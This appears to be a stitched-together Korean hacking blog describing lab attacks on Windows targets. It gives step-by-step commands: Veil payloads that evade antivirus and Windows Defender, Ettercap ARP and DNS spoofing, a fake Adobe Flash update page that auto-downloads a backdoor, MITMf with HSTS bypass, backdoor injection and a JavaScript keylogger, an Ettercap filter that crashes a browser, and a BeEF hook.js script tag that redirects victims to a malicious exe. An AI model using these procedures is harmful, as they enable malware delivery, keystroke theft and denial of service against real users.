저번에 포스팅한 것 보단 이런 방법이 나을거같아서 새로 포스팅했습니다.

일단 Veil을 사용해서 악성코드를 하나 생성해줍니다.
msfvenom으로 만들면 백신을 안깔아도 크롬에서 자체적으로 걸러버리네요.

그리고 저번에 포스팅한것처럼 이더캡 그래픽버전에서 공격대상을 설정한뒤 스푸핑 설정을 합니다.

그리고 index.html로 사용할 페이지 소스를 수정했습니다.
네이버 광고부분에 어도비플레쉬 업데이트가 문제있는 것 처럼 뜨게 만들었습니다.

퀄리티있게 만들기 귀찮아서 그냥 그림판으로 그린건데,
그럴듯하게 어도비에서 그림 가져오면 나을것같습니다.

또한 소스수정을 통해 사이트에 접속하면 곧바로 파일이 다운로드되게 수정했습니다.

어떤식으로 소스를 수정해야 하는지에 대해서는 기본적인 웹공부를 하신분이라면 금방 수정하실 수 있을거 같습니다.

아까만든 악성코드 핸들러를 실행시켜줍니다.

그리고 이제 공격대상의 크롬으로 인터넷을 들어가보겠습니다.

인터넷에 접속하면 광고창에는 미리 설정한 그림들과 악성파일이 바로 다운로드 된것을 확인 할 수 있습니다.

사용자가 자연스럽게 adobe.exe 파일을 실행하도록 유도합니다.

세션이 열린것을 확인 할 수 있습니다.
끝

중간자 공격(man in the middle attack, MITM) 종합툴인 mitmf를 대략 살펴봤다.

도움말을 살펴보면 많은 기능을 탑제하고 있다.
arp스푸핑도 할 수 있고, 리다이렉션도 하고 되게기능이 많다.

살펴보면 키로거도 있다. 짱이다.

그중에서 filepwn 이란 플러그인 기능을 사용해보려고 한다.
설명엔 백도어 응용프로그램을 http프로토콜을 사용해서 보내는 거라고 한다. bdfactory가 뭔지 모르겠다.

미리 위와같이 설정해두고, 배포할 악성코드 핸들러를 실행시켜 놉니당

그리고 mitmf 명령어를 아래와같이 입력해줍니다.
게이트웨이는 라우터 주소 넣어주면되고
(가상환경에선 실제 공유기 이더넷 인터페이스 넣어주니까 안되더라구요, route -n해서 나오는 값 넣어줘야됨)
타겟은 공격할 대상의 아이피를 넣어주면 됩니당.

mitmf –spoof –arp -i eth0 –gateway 192.168.254.2 –target 192.168.254.132 –hsts –filepwn

스푸핑이 되긴했는데, 사용한 mitmf에 문제가 좀 있는지 칼리 콘솔보면 예외처리랑 에러가 좀 뜨네요.
버전도 최신으로 업글했는뎅… ㅇㅅㅇ??

나중에 다시해야겠따…

구글링 해보니 해결방법이 있었습니다
아래와같이 pip로 Twisted==15.5.0 다운받으시면 됩니다.
pip install Twisted==15.5.0

filepwn기능은 에러가 계속 떠서 다른 기능을 사용해봤습니다.
키로거랑 이미지 거꾸로 돌리는 기능을 사용했는데, 크롬에선 잘 안되고 익스플로러에선 잘 적용이 됩니다.

명령어는 –jskeylogger / –upsidedouwnternet 입니다.

다른 기능들은 잘 실행되는 모습입니다. 그외에도 인터벌을 주고 대상의 인터넷 화면을 캡쳐하는 등 다양한 기능이 있습니다.
앞으로 다른 기능들을 차근차근 살펴보면 굉장히 유용한 툴이 될거같습니다.

칼리 내장툴 Ettercap을 사용한 간단한 DOS 누킹 공부.

먼저 간단한 코드를 하나 짜준다.

Ettercap의 기능인 drop와 kill 함수를 사용 할 때 마다 메시지를 출력하게 했다.

etterfilter dos.elt -o dos.ef 을 입력해서 ef파일을 생성해준다
etterfilter의 도움말을 보면 -o 는 파일을 아웃푼해준다. 라는 설명이 있다.

ettercap -i eth0 -T -q -F dos.ef -M ARP 명령어를 입력한다.
각 명령어 도움말은
i, –iface use this network interface T, --text use text only GUI Q, --superquiet do not display user and password F, --filter load the filter (content filter) M, --mitm perform a mitm attack

윈7의 브라우저가 뻗었습니다.
끝

크게 두 단계로 나누면

1.내장툴 ettercap 을 사용해서 DNS스푸핑 공격을 한다.

2.beef를 사용해서 백도어가 다운되게 리다이렉션 한다.

etter.dns 파일을 위와같이 수정해준다.

아파치서버를 실행시킨다.

칼리리눅스 내장툴인 ettercap 을 실행시킨다.

1. eth0을 잡고 호스트를 스캔한다.

2. 게이트웨이를 타겟1에/ 공격대상을 타겟2로 설정해준다.

3. ARP 포지셔닝에서 Sniff remote connection을 체크한다.

4. 플러그인에서 dns_spoof 를 설정한다.

공격대상인 윈7 가상환경에서 네이버에 접속하면 미리 만들어둔

/var/www/html 경로의 index.html 의 내용이 연결된다.

Beef 서버를 실행시키고. Hook URL을 위에 연결된 index.html에 넣어준다.

script src=”http://192.168.254.129:3000/hook.js”type=”text/javascript”

/var/www/html 경로에 악성백도어를 저장하고,

UI패널을 열어서 (id/pw = beef/beef) 로그인을 한 뒤,리다이렉션 주소에 악성백도어 파일명.확장자명 을 입력한다.

그리고 적용시킨다.

윈도우7 화면에는 kangol.exe 파일이 다운로드가 되었다.

(중간에 네이버처럼 보이도록 연결될 html을 수정했다)

윈도우7에서 다운받은 백도어를 실행시키면 칼리에서 세션이 열린것을 확인 할 수 있다.

먼저 설치한다.
apt-get install veil-evasion

/usr/share/veil-evasion 경로에 실행파일 있고
/var/lib/veil-evasion 경로에는 아웃풋이 저장된다.

./Veil-Evasion.py 을 실행시킨다.

실행화면이다.

1. list를 입력해서 페이로드 목록들 중에서 선택한다.
2. 셋팅화면에서 로컬호스트 주소를 설정해준다.
3. generate 로 들어간다.
4. 악성파일 이름을 정해준다.
5. 디폴트값 입력해주고 엔터

그러면 자동으로 핸들러가 생성되고 악성파일도 생성된다.
경로는 생성창에서 볼 수 있다.

생성한 파일을 백신이 켜져있는 곳에 놔도 감지가 안된다.

생성된 핸들러를 메타스플로잇 콘솔로 실행시키고,
악성파일을 윈10 윈도우디펜스가 켜진 곳에서 실행시켰다.

세션 열렸다 잘된다.